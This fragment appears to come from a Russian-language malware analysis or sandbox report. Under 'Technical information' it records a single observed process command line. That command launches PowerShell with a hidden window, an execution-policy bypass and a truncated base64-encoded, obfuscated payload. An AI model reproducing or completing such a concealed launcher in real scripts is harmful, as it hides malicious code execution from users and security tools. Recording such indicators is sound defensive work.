Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w h -EP Bypass -e KAAnACgAKAAnACAAIAB8ACAAIAAlAHsAJAB7ACQAKAAtAH0AIAAgAD0AIAAgACsAJAAoACkAfQB7ACQAewB+ACEAXQB9AD0AJAB7ACQAKAAtAH0AfQB7ACQAewAjAH0APQArACsAIAAgACQAewAkACgALQB9AH0AIAAgAHsAJAB7AC...' (со скрытым окном)